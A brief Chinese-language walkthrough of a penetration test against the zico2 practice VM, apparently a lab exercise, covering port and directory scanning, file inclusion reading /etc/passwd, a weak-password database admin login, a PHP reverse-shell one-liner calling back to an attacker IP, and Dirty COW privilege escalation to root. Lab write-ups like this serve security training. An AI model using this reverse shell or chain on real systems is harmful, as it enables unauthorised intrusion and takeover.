zico2靶机渗透测试

利用nmap进行主机发现，扫描vm网卡的端口。

172.16.158.1为本机ip，对172.16.158.129进行扫描

首先对目录进行扫描

访问网站，发现可以访问的连接view.php。

猜测有文件包含，尝试读取/etc/passwd，可以进行文件包含。

访问扫描到的dbadmin文件夹，发现一个数据库管理页面。弱口令admin登陆。

发现存在文件路径，用刚才的文件包含尝试发现可以包含到。

文件存储了表结构，构造数据库文件进行getshell。

命令可以执行，可以getshell。

先将shell弹到本地。

利用php sock弹shell。

1	<?php $sock=fsockopen("172.16.158.1",2333);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

执行php shell.php

根据linux内核版本找到脏牛进行提权。

切换firefart用户获取root权限。